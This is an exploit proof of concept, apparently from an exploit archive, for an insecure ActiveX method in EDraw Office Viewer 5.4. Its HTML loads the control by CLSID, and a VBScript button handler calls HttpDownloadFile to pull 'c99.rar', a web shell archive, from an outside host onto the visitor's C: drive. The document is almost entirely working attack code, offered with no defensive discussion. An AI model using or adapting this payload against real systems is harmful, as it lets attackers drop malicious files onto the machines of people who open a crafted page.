EDraw Office Viewer 5.4 HttpDownloadFile() Insecure Method Vuln

===============================================================
EDraw Office Viewer 5.4 HttpDownloadFile() Insecure Method Vuln
===============================================================

<object classid='clsid:6BA21C22-53A5-463f-BBE8-5CF7FFA0132B' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  On Error Resume Next
    test.HttpDownloadFile "http://exploiter5.com/Cyber-Zone/c99.rar", "c:\Cyber-Zone\c99.rar"
    MsgBox("Done!")
 End Sub
</script>
</span>
</code></pre>



#  0day.today [2018-03-06]  #